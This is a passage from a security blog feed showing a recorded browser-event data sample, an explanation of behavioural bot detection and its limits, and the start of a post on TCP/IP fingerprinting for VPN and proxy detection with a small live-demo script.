class="s2">"m"</span><span class="p">,</span><span class="mf">585</span><span class="p">,</span><span class="mf">337</span><span class="p">,</span><span class="mf">2505</span><span class="p">,</span><span class="mf">438</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1578.15</span><span class="p">],</span>
<span class="p">[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">463</span><span class="p">,</span><span class="mf">357</span><span class="p">,</span><span class="mf">2383</span><span class="p">,</span><span class="mf">458</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1595.69</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">361</span><span class="p">,</span><span class="mf">373</span><span class="p">,</span><span class="mf">2281</span><span class="p">,</span><span class="mf">474</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1611.97</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">291</span><span class="p">,</span><span class="mf">375</span><span class="p">,</span><span class="mf">2211</span><span class="p">,</span><span class="mf">476</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1628.015</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">247</span><span class="p">,</span><span class="mf">369</span><span class="p">,</span><span class="mf">2167</span><span class="p">,</span><span class="mf">470</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1645.06</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">241</span><span class="p">,</span><span class="mf">363</span><span class="p">,</span><span class="mf">2161</span><span class="p">,</span><span class="mf">464</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1662.015</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">241</span><span class="p">,</span><span class="mf">350</span><span class="p">,</span><span class="mf">2161</span><span class="p">,</span><span class="mf">451</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1679.215</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">257</span><span class="p">,</span><span class="mf">323</span><span class="p">,</span><span class="mf">2177</span><span class="p">,</span><span class="mf">424</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1695.82</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">295</span><span class="p">,</span><span class="mf">287</span><span class="p">,</span><span class="mf">2215</span><span class="p">,</span><span class="mf">388</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1712.785</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">355</span><span class="p">,</span><span class="mf">263</span><span class="p">,</span><span class="mf">2275</span><span class="p">,</span><span class="mf">364</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1729.085</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">445</span><span class="p">,</span><span class="mf">247</span><span class="p">,</span><span class="mf">2365</span><span class="p">,</span><span class="mf">348</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1746.455</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">561</span><span class="p">,</span><span class="mf">247</span><span class="p">,</span><span class="mf">2481</span><span class="p">,</span><span class="mf">348</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1762.92</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">697</span><span class="p">,</span><span class="mf">253</span><span class="p">,</span><span class="mf">2617</span><span class="p">,</span><span class="mf">354</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1778.59</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">817</span><span class="p">,</span><span class="mf">269</span><span class="p">,</span><span class="mf">2737</span><span class="p">,</span><span class="mf">370</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1795.34</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">915</span><span class="p">,</span><span class="mf">283</span><span class="p">,</span><span class="mf">2835</span><span class="p">,</span><span class="mf">384</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1812.275</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">983</span><span class="p">,</span><span class="mf">293</span><span class="p">,</span><span class="mf">2903</span><span class="p">,</span><span class="mf">394</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1829.455</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1025</span><span class="p">,</span><span class="mf">305</span><span class="p">,</span><span class="mf">2945</span><span class="p">,</span><span class="mf">406</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1845.63</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1045</span><span class="p">,</span><span class="mf">313</span><span class="p">,</span><span class="mf">2965</span><span class="p">,</span><span class="mf">414</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">1863.225</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1047</span><span class="p">,</span><span class="mf">314</span><span class="p">,</span><span class="mf">2967</span><span class="p">,</span><span class="mf">415</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2086.09</span><span class="p">]</span>
<span class="p">,[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1047</span><span class="p">,</span><span class="mf">317</span><span class="p">,</span><span class="mf">2967</span><span class="p">,</span><span class="mf">418</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2095.995</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1047</span><span class="p">,</span><span class="mf">319</span><span class="p">,</span><span class="mf">2967</span><span class="p">,</span><span class="mf">420</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2113.245</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1046</span><span class="p">,</span><span class="mf">323</span><span class="p">,</span><span class="mf">2966</span><span class="p">,</span><span class="mf">424</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2129.86</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1046</span><span class="p">,</span><span class="mf">324</span><span class="p">,</span><span class="mf">2966</span><span class="p">,</span><span class="mf">425</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2146.645</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1046</span><span class="p">,</span><span class="mf">329</span><span class="p">,</span><span class="mf">2966</span><span class="p">,</span><span class="mf">430</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2162.54</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1045</span><span class="p">,</span><span class="mf">333</span><span class="p">,</span><span class="mf">2965</span><span class="p">,</span><span class="mf">434</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2179.16</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1045</span><span class="p">,</span><span class="mf">334</span><span class="p">,</span><span class="mf">2965</span><span class="p">,</span><span class="mf">435</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2198.62</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1041</span><span class="p">,</span><span class="mf">335</span><span class="p">,</span><span class="mf">2961</span><span class="p">,</span><span class="mf">436</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2423.58</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1030</span><span class="p">,</span><span class="mf">335</span><span class="p">,</span><span class="mf">2950</span><span class="p">,</span><span class="mf">436</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2431.07</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">1005</span><span class="p">,</span><span class="mf">329</span><span class="p">,</span><span class="mf">2925</span><span class="p">,</span><span class="mf">430</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2446.315</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">887</span><span class="p">,</span><span class="mf">299</span><span class="p">,</span><span class="mf">2807</span><span class="p">,</span><span class="mf">400</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2463.15</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">793</span><span class="p">,</span><span class="mf">269</span><span class="p">,</span><span class="mf">2713</span><span class="p">,</span><span class="mf">370</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2479.685</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">695</span><span class="p">,</span><span class="mf">245</span><span class="p">,</span><span class="mf">2615</span><span class="p">,</span><span class="mf">346</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2496.445</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">617</span><span class="p">,</span><span class="mf">221</span><span class="p">,</span><span class="mf">2537</span><span class="p">,</span><span class="mf">322</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2512.475</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">553</span><span class="p">,</span><span class="mf">193</span><span class="p">,</span><span class="mf">2473</span><span class="p">,</span><span class="mf">294</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2530.245</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">507</span><span class="p">,</span><span class="mf">173</span><span class="p">,</span><span class="mf">2427</span><span class="p">,</span><span class="mf">274</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2545.655</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">475</span><span class="p">,</span><span class="mf">155</span><span class="p">,</span><span class="mf">2395</span><span class="p">,</span><span class="mf">256</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2563.26</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">459</span><span class="p">,</span><span class="mf">147</span><span class="p">,</span><span class="mf">2379</span><span class="p">,</span><span class="mf">248</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2579.82</span><span class="p">],</span>
<span class="p">[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">458</span><span class="p">,</span><span class="mf">145</span><span class="p">,</span><span class="mf">2378</span><span class="p">,</span><span class="mf">246</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2596.655</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">456</span><span class="p">,</span><span class="mf">143</span><span class="p">,</span><span class="mf">2376</span><span class="p">,</span><span class="mf">244</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2671.46</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">449</span><span class="p">,</span><span class="mf">140</span><span class="p">,</span><span class="mf">2369</span><span class="p">,</span><span class="mf">241</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2679.625</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">434</span><span class="p">,</span><span class="mf">137</span><span class="p">,</span><span class="mf">2354</span><span class="p">,</span><span class="mf">238</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2695.88</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">415</span><span class="p">,</span><span class="mf">135</span><span class="p">,</span><span class="mf">2335</span><span class="p">,</span><span class="mf">236</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2712.485</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">398</span><span class="p">,</span><span class="mf">132</span><span class="p">,</span><span class="mf">2318</span><span class="p">,</span><span class="mf">233</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2729.495</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">382</span><span class="p">,</span><span class="mf">130</span><span class="p">,</span><span class="mf">2302</span><span class="p">,</span><span class="mf">231</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2746.1</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">369</span><span class="p">,</span><span class="mf">126</span><span class="p">,</span><span class="mf">2289</span><span class="p">,</span><span class="mf">227</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2762.54</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">357</span><span class="p">,</span><span class="mf">121</span><span class="p">,</span><span class="mf">2277</span><span class="p">,</span><span class="mf">222</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2779.69</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">353</span><span class="p">,</span><span class="mf">117</span><span class="p">,</span><span class="mf">2273</span><span class="p">,</span><span class="mf">218</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2796.41</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">347</span><span class="p">,</span><span class="mf">112</span><span class="p">,</span><span class="mf">2267</span><span class="p">,</span><span class="mf">213</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2813.59</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">342</span><span class="p">,</span><span class="mf">104</span><span class="p">,</span><span class="mf">2262</span><span class="p">,</span><span class="mf">205</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2829.67</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">340</span><span class="p">,</span><span class="mf">94</span><span class="p">,</span><span class="mf">2260</span><span class="p">,</span><span class="mf">195</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2846.54</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">340</span><span class="p">,</span><span class="mf">82</span><span class="p">,</span><span class="mf">2260</span><span class="p">,</span><span class="mf">183</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2863.09</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">340</span><span class="p">,</span><span class="mf">74</span><span class="p">,</span><span class="mf">2260</span><span class="p">,</span><span class="mf">175</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2879.195</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">340</span><span class="p">,</span><span class="mf">68</span><span class="p">,</span><span class="mf">2260</span><span class="p">,</span><span class="mf">169</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2896.52</span><span class="p">],</span>
<span class="p">[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">343</span><span class="p">,</span><span class="mf">63</span><span class="p">,</span><span class="mf">2263</span><span class="p">,</span><span class="mf">164</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2913.185</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">349</span><span class="p">,</span><span class="mf">56</span><span class="p">,</span><span class="mf">2269</span><span class="p">,</span><span class="mf">157</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2929.87</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">356</span><span class="p">,</span><span class="mf">49</span><span class="p">,</span><span class="mf">2276</span><span class="p">,</span><span class="mf">150</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2945.855</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">360</span><span class="p">,</span><span class="mf">42</span><span class="p">,</span><span class="mf">2280</span><span class="p">,</span><span class="mf">143</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2962.555</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">363</span><span class="p">,</span><span class="mf">38</span><span class="p">,</span><span class="mf">2283</span><span class="p">,</span><span class="mf">139</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2979.245</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">363</span><span class="p">,</span><span class="mf">36</span><span class="p">,</span><span class="mf">2283</span><span class="p">,</span><span class="mf">137</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">2995.905</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">363</span><span class="p">,</span><span class="mf">35</span><span class="p">,</span><span class="mf">2283</span><span class="p">,</span><span class="mf">136</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3013.1</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">363</span><span class="p">,</span><span class="mf">32</span><span class="p">,</span><span class="mf">2283</span><span class="p">,</span><span class="mf">133</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3030.145</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">364</span><span class="p">,</span><span class="mf">30</span><span class="p">,</span><span class="mf">2284</span><span class="p">,</span><span class="mf">131</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3045.57</span><span class="p">],</span>
<span class="p">[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">365</span><span class="p">,</span><span class="mf">24</span><span class="p">,</span><span class="mf">2285</span><span class="p">,</span><span class="mf">125</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3063.08</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">367</span><span class="p">,</span><span class="mf">18</span><span class="p">,</span><span class="mf">2287</span><span class="p">,</span><span class="mf">119</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3079.46</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">369</span><span class="p">,</span><span class="mf">11</span><span class="p">,</span><span class="mf">2289</span><span class="p">,</span><span class="mf">112</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3096.24</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">371</span><span class="p">,</span><span class="mf">4</span><span class="p">,</span><span class="mf">2291</span><span class="p">,</span><span class="mf">105</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3112.335</span><span class="p">],[</span><span class="s2">"m"</span><span class="p">,</span><span class="mf">371</span><span class="p">,</span><span class="mf">2</span><span class="p">,</span><span class="mf">2291</span><span class="p">,</span><span class="mf">103</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">3126.395</span><span class="p">],</span>
<span class="p">[</span><span class="s2">"bu"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5056.1</span><span class="p">],[</span><span class="s2">"ph"</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5105.305</span><span class="p">],[</span><span class="s2">"vc"</span><span class="p">,</span><span class="s2">"hidden"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5105.48</span><span class="p">],[</span><span class="s2">"ul"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">5105.625</span><span class="p">],[</span><span class="s2">"wsEnd"</span><span class="p">,</span><span class="kc">null</span><span class="p">,</span><span class="mf">5105.625</span><span class="p">]</span>
<span class="p">]</span>
</code></pre></div>
<p>where</p>
<ol>
<li><code>s</code> stands for <code>scroll</code> event</li>
<li><code>m</code> stands for <code>mousemove</code></li>
<li><code>dcl</code> is the <code>domcontentloaded</code> event</li>
<li><code>vc</code> is the <code>visibilitychange</code> event</li>
<li>The last array element is always the timestamp obtained with <code>performance.now()</code>. So for example in the frame <code>["s",0,3561,1,1062.775]</code>, 1062.775 is the timestamp.</li>
</ol>
<h2>How to Detect Bots with Behavioral Analysis?</h2>
<p>Humans behave like a chaotic systems.</p>
<p>Humans move their mouse, keyboard, touch screen and scrolling wheel in an organic fashion. Bots still have a hard time to mimic mouse movements and touchscreen taps like real humans.</p>
<p>A simple process to distinguish bots from real humans based on behavioral data could look like the following:</p>
<ol>
<li>The first step is to collect and extract certain features from a huge set of recorded behavioral data samples. </li>
<li>The next (and way harder) step is to label the data set as either human or bot-like. This requires to have enough samples from both categories.</li>
<li>The last step requires to train a neuronal network. This allows us to accurately classify live behavior samples just in time.</li>
</ol>
<p>That is way easier said than done. However, there are some companies such as <a href="https://www.biocatch.com/">biocatch</a> and <a href="https://www.perimeterx.com/">perimeterx</a> that are already using this approach since years.</p>
<p>But what exactly makes mouse or touch event interaction in a browser <em>human</em>? What are features that are extremely hard to emulate mechanically? Some rough ideas (replace <em>mouse</em> with touch events in case of mobile devices):</p>
<ul>
<li>The mouse is used as a reading aid (observe yourself <em>right now</em>)</li>
<li>The start and stop speed of the mouse between points of interest</li>
<li>The trajectory of mouse movements</li>
<li>The distribution of events over time. Humans look at the screen, process the information visually and react physically. This pattern repeats all the time. The latency in such reaction patterns is intrinsically human.</li>
<li>Time interval between <code>mousedown</code> and <code>mouseup</code> events</li>
<li>The interval between <code>keydown</code> and <code>keyup</code> events depends heavily on the writing skills of the human</li>
<li>Timing statistics when typing: Pressing two identical letters almost always is faster in the second letter.</li>
<li>Mouse follows the eye focus point</li>
<li>Scrolling speed correlates with reading speed</li>
<li>spikes in behavioral data when a website requires interaction</li>
<li>mouse moves to the top (tabs) when navigating away (not in mobile)</li>
<li>mobile only: sometimes screen dimensions plummets 180 degrees on auto-rotate</li>
<li>on disinterest, mouse races very fast to the "close tab" button</li>
<li>Areas of interest in text are highlighted</li>
<li>...?</li>
</ul>
<p>The established method to distinguish humans from bots is the good old captcha. However, we are approaching an age where <a href="https://incolumitas.com/2021/01/02/breaking-audio-recaptcha-with-googles-own-speech-to-text-api/">captchas can be solved</a> better by AI than by real humans.</p>
<h2>Limitations of Behavioral Bot Detection</h2>
<p>There are some limitations regarding bot detection with behavioral analysis:</p>
<ol>
<li>
<p>Behavioral analysis takes some sampling time before there is enough data to properly classify the recorded behavior. Put differently: When only considering behavioral analysis, bots can wreak havoc in the first initial seconds after page load (Let's say 0 - 5 seconds).</p>
</li>
<li>
<p>What happens when a bot injects behavioral data that was recorded somewhere else (for example on the attackers own website)? Without knowing the intent of the behavioral data, it is impossible to detect that the recorded behavior is human but from <em>somewhere else</em>.</p>
</li>
<li>
<p>Sometimes there just is no behavioral data to analyze. Sometimes Internet users open a web page for later (for example with the middle pointer of the mouse) but never chose to interact with the website.</p>
</li>
</ol>
<h2>Resources</h2>
<ul>
<li>https://github.com/das-th-koeln/HOSIT</li>
<li>https://epb.bibl.th-koeln.de/frontdoor/deliver/index/docId/1369/file/Risk-based_Authentication_Study_Final.pdf</li>
<li>https://epb.bibl.th-koeln.de/frontdoor/deliver/index/docId/1422/file/Wiefling_HOSIT_NordSec2019.pdf</li>
</ul>TCP/IP Fingerprinting for VPN and Proxy Detection2021-03-13T14:54:00+01:002021-03-19T21:23:00+01:00Nikolai Tschachertag:incolumitas.com,2021-03-13:/2021/03/13/tcp-ip-fingerprinting-for-vpn-and-proxy-detection/<p>TCP/IP fingerprinting is as old as the Internet itself. But this technique seems to have lost it's relevancy in our modern times. However, with the rise of Proxy and VPN Providers, TCP/IP fingerprinting becomes interesting again from a security perspective.</p><p><a class="btn" href="https://github.com/NikolaiT/zardaxt/" style="padding: 10px; font-weight: 600; font-size: 15px;">TCP/IP Fingerprinting Tool - GitHub</a></p>
<h2>Live Detection</h2>
<p>Based on your initial TCP/IP SYN packet, your device most likely is:</p>
<pre id="tcpipFp">
...loading
</pre>
<script>
fetch('https://tcpip.incolumitas.com/classify?by_ip=1')
.then(response => response.json())
.then(function(data) {
document.getElementById('tcpipFp').innerText = JSON.stringify(data, null, 2);
})
</script>
<p>Your User-Agent (<code>navigator.userAgent</code>) says that you are </p>
<pre id="userAgent">
</pre>
<script>
document.getElementById('userAgent').innerText = navigator.userAgent;
</script>
<h2>Examples</h2>
